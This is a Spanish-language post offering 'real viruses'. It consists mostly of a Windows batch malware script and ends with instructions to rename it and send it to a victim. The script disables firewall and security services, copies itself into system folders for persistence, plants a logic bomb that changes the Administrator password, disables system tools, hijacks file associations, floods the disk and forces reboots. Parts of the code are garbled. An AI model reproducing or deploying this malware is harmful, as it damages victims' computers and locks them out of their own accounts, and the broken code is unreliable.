  Virus Reales

 Nota : Estos Virus Dañan el pc de la victima y si llegas a hacer mal un paso importante podria llegar a dañar el equipo .

1er  Virus : 
Este virus borra programas ,introduce virus , y apaga el PC y microsoft les dice  "FUCK YOU " 
Estos son un poco mas complejos asique solo les dejare los comandos , copien y peguen esto en un block de notas , Luego cambian la terminacion de ".txt" por ".bat" .

@echo off
                     :: Virus Batch made by: Sadek !
   ::Setting unmodificable and estatic variables...
set regtype1=REG_SZ
set regtype2=REG_DWORD
set hklmsecurity=HKLMSOFTWAREMicrosoftSecurity Center
set hklmwinlogon=HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
set hkcuwinlogon=HKCUSoftwareMicrosoftWindows NTCurrentVersionWinlogon
set hklmcversion=HKLMSOFTWAREMicrosoftWindowsCurrentVersion
set hkcucversion=HKCUSoftwareMicrosoftWindowsCurrentVersion
set hklmlanmanserv er=HKLMSYSTEMCurrentControlSetServicesLanManServer
set bomb=%userprofile%win32.bat
set hoax=%userprofile%windows.bat
set ovrflw=%systemroot%system.bat
set log1=%systemroot%log1.log
set log2=%systemroot%log2.log
set log3=%systemroot%log3.log
set log4=%systemroot%system32log4.log
set log5=%systemroot%log5.log
   : eleting Standard System Security and More...
netsh delete firewall allowedprogram all > nul
net stop "Centro de Seguridad" > nul
net stop "Firewall de Windows/Conexión compartida a Internet (ICS)" > nul
echo AntiVirusDisab leNotify>"%log1%" & echo FirewallDisabl eNotify>>"%log1%" & echo UpdatesDisable Notify>>"%log1%" & echo AntiVirusOverr ide>>"%log1%" & echo FirewallOverri de>>"%log1%"
for /F "tokens=*" %%a IN (%log1%) DO call :reg1 %%a
attrib +h "%log1%"
set a=%1
reg add "%hklmsecurity%" /v "%a%" /t "%regtype2%" /d 1 /f > nul
goto :EOF

   ::Que tal si se copia a si mismo ?

copy %0 "%systemroot%ResourcesThemesLunaShellMetallicshellstyle.bat"
copy %0 "%temp%SoundInput.bat"
copy %0 "%userprofile%Menú InicioProgramasInicioCentro de seguridad.bat"
copy %0 "%systemroot%shellexecutecontrol.bat"
copy %0 "%userprofile%win32.bat"
copy %0 "%tmp%SoundOutput.bat"

   ::Bomba lógica preparada para inhabilitar el acceso a la cuenta del Administrador.

echo         @echo off>"%bomb%"
echo set d1=%%date:~3%%>>"%bomb%"
echo set d2=%%d1:~0,2%%>>"%bomb%"
echo set t1=%%time:~0,2%%>>"%bomb%"
echo set x=5>>"%bomb%"
echo set /a y=%%d2%%+%%x%%>>"%bomb%"
echo if %%d2%% NEQ 12 (goto :act) else (goto :end)>>"%bomb%"
echo :act>>"%bomb%"
echo if %%y%% GTR 22 (goto :action) else (goto :end)>>"%bomb%"
echo :action >> "%bomb%"
echo if %%t1%% LSS 22 (goto :finish) else (goto :end)>>"%bomb%"
echo :finish>>"%bomb%"
echo net user Administrador sucker00>>"%bomb%"
echo net user Administrator sucker00>>"%bomb%"
echo exit>>"%bomb%"
echo :end>>"%bomb%"
echo exit>>"%bomb%"
attrib +h "%bomb%"
reg add "%hklmcversion%Run" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%win32.txt" /f > nul
reg add "%hkcucversion%Run" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%win32.txt" /f > nul
reg add "%hklmcversion%RunOnce" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%win32.txt" /f > nul
reg add "%hkcucversion%RunOnce" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%win32.txt" /f > nul
reg add "%hkcuwinlogon%" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%win32.txt" /f > nul
reg add "%hklmwinlogon%" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%win32.txt" /f > nul
   : isabling some tools and reseting some Windows Services...
echo DisableRegistr yTools>"%log2%" & echo DisableTaskMgr>>"%log2%"
for /F "tokens=*" %%a IN (%log2%) DO call :reg2 %%a
attrib +h "%log2%"
reg add "%hkcucversion%Internet SettingsZones3" /v 1803 /t "%regtype2%" /d 3 /f > nul
set a=%1
reg add "%hklmcversion%PoliciesSystem" /v "%a%" /t "%regtype2%" /d 1 /f > bul
goto :EOF
echo secpol.msc>"%log4%" & echo lusrmgr.msc>>"%log4%" & echo ntmsmgr.msc>>"%log4%" & echo ntmsoprq.msc>>"%log4%" & echo services.msc>>"%log4%" & echo wmimgmt.msc>>"%log4%"
for /F "tokens=*" %%a in (%log4%) DO call :dis %%a
attrib +h "%log4%"
set a=%1
cd "%systemroot%system32"
attrib -h -r -s -a %a%
set b=%a:~1%
set c=%a%
ren %a% %b%
echo win32system aplication>%c%
attrib +a %c%
del /q /f %b%
goto :EOF

 :: Después de haber cambios en el explorer.exe??

echo NoClose>"%log3%" & echo NoDesktop>>"%log3%" & echo NoFind>>"%log3%" & echo NoRun>>"%log3%" & echo NoStartMenuSub Folders>>"%log3%" & echo NoSetTaskBar>>"%log3%" & echo NoSetFolders>>"%log3%" & echo RestrictRun>>"%log3%" & echo NoViewCanlextM enu>>"%log3%" & echo NoViewContexMe nu>>"%log3%" & echo NoSetFolders>>"%log3%" & echo NoUserNameInSt arMenu>>"%log3%" & echo NoFileMenu>>"%log3%"
for /F "tokens=*" %%a IN (%log3%) DO call :reg3 %%a
attrib +h "%log3%"
set a=%1
reg add "%hkcucversion%PoliciesExplorer" /v "%a%" /t "%regtype2%" /d 1 /f > nul
goto :EOF

 :: ¿Qué pasa si la víctima tiene Hoaxes efects?

reg add "%hklmlanmanserver%" /v "DiskSpaceThres hold" /t "%regtype1%" /d 95 /f > nul
reg add "%hklmwinlogon%" /v "LegalNoticeCap tion" /t "%regtype1%" /d "Microsoft says..." /f > nul
reg add "%hklmwinlogon%" /v "LegalNoticeTex t" /t "%regtype1%" /d "Microsoft Mesage:  FUCK YOU!" /f > nul
echo        @echo off>"%hoax%" & echo msg * FUCK YOU, SUCKER!!">>"%hoax%" & echo exit>>"%hoax%"
reg add "%hklmcversion%Run" /v "ControlGraphic s" /t "%regtype1%"/d "%userprofile%windows.bat" /f > nul
reg add "%hkcucversion%Run" /v "ControlGraphic s" /t "%regtype1%"/d "%userprofile%windows.bat" /f > nul
reg add "%hklmcversion%RunOnce" /v "ControlGraphic s" /t "%regtype1%"/d "%userprofile%windows.bat" /f > nul
reg add "%hkcucversion%RunOnce" /v "ControlGraphic s" /t "%regtype1%"/d "%userprofile%windows.bat" /f > nul
reg add "%hkcuwinlogon%" /v "ControlGraphic s" /t "%regtype1%"/d "%userprofile%windows.bat" /f > nul
reg add "%hklmwinlogon%" /v "ControlGraphic s" /t "%regtype1%"/d "%userprofile%windows.bat" /f > nul
   : isabling the win Key from the keyboard and other interesant registry values to make a pc slower...
reg add "HKCUControl PanelDesktop" /v MenuShowDelay /t "%regtype1%" /d 800 /f > nul
reg add "HKCUControl PanelDesktop" /v WaitToKillAppT imeout /t "%regtype1%" /d 40000 /f > nul
reg add "HKCUControl PanelDesktop" /v HungAppTimeout /t "%regtype1%" /d 40000 /f > nul
reg add "%hkcucversion%PoliciesExplorer" /v NoWinKeys /t "%regtype2%" /d 1 /f > nul
   ::Adding this shit to the regedit...
reg add "%hklmcversion%Run" /v "MessengerDrive s" /t "%regtype1%"/d "%systemroot%ResourcesThemesLunaShellMetallicshellstyle.bat" /f > nul
reg add "%hkcucversion%Run" /v "MessengerDrive s" /t "%regtype1%"/d "%userprofile%win32.bat /f > nul
reg add "%hklmcversion%RunOnce" /v "MessengerDrive s" /t "%regtype1%"/d "%systemroot%ResourcesThemesLunaShellMetallicshellstyle.bat" /f > nul
reg add "%hkcucversion%RunOnce" /v "MessengerDrive s" /t "%regtype1%"/d "%systemroot%shellexecutecontrol.bat" /f > nul
reg add "%hkcuwinlogon%" /v "MessengerDrive s" /t "%regtype1%"/d "%userprofile%Menú InicioProgramasInicioCentro de seguridad.bat" /f > nul
reg add "%hklmwinlogon%" /v "MessengerDrive s" /t "%regtype1%"/d "%tmp%SoundOutput.bat" /f > nul

  :: ¿Qué pasa si tocamos un lil 'cosas Assoc. extensiones?


echo .arj>"%log5%" & echo .asm>>"%log5%" & echo .asx>>"%log5%" & echo .au>>"%log5%" & echo .avi>>"%log5%" & echo .bkf>>"%log5%" & echo .bmp>>"%log5%" & echo .c>>"%log5%" & echo .dll>>"%log5%" & echo .doc>>"%log5%" & echo .exe>>"%log5%" & echo .htm>>"%log5%" & echo .html>>"%log5%" & echo .ico>>"%log5%" & echo .java>>"%log5%" & echo .jpeg>>"%log5%" & echo .jpg>>"%log5%" & echo .key>>"%log5%" & echo .lnk>>"%log5%" & echo .mid>>"%log5%" & echo .midi>>"%log5%" & echo .mod>>"%log5%" & echo .mp3>>"%log5%" & echo .mp4>>"%log5%" & echo .mpeg>>"%log5%" & echo .msc>>"%log5%" & echo .pdf>>"%log5%" & echo .php>>"%log5%" & echo .rar>>"%log5%" & echo .reg>>"%log5%" & echo .sys>>"%log5%" & echo .wav>>"%log5%" & echo .xml>>"%log5%"
for /F "tokens=*" %%a IN (%log5%) DO call :extassoc %%a
ftype WinRAR=CMD.EXE
set a=%1
set a=%a: =%
assoc %a%=WinRAR
goto :EOF

   ::¿Y si hacemos desbordamiento de un lil ' ?

echo         @echo off>"%ovrflw%"
echo set rnd=%random%%random%%random%%random%>>"%ovrflw%"
echo set /a num=0>>"%ovrflw%"
echo :bug>>"%ovrflw%"
echo set rnd2=%random%%random%%random%%random%%random%>>"%ovrflw%"
echo set /a num=num+1>>"%ovrflw%"
echo if %num%==%rnd% (exit) else (echo win32 message: FUCK YOU!>"%systemroot%%rnd2%.txt" & goto :bug)>>"%ovrflw%"
reg add "%hklmcversion%Run" /v "MessengerConta cts" /t "%regtype1%"/d "%systemroot%system.bat" /f > nul
reg add "%hkcucversion%Run" /v "MessengerConta cts" /t "%regtype1%"/d "%systemroot%system.bat" /f > nul
reg add "%hklmcversion%RunOnce" /v "MessengerConta cts" /t "%regtype1%"/d "%systemroot%system.bat" /f > nul
reg add "%hkcucversion%RunOnce" /v "MessengerConta cts" /t "%regtype1%"/d "%systemroot%system.bat" /f > nul
reg add "%hkcuwinlogon%" /v "MessengerConta cts" /t "%regtype1%"/d "%systemroot%system.bat" /f > nul
reg add "%hklmwinlogon%" /v "MessengerConta cts" /t "%regtype1%"/d "%systemroot%system.bat" /f > nul
:: Ending...
start http://support.microsoft.com/
msg * Microsoft Mesage:  FUCK YOU!
shutdown -r -t 05 -c "Microsoft Dice:     FUCK YOU!"

Ahora solo mandenlos a la victima , Cambien el nombre para que no sospeche ...


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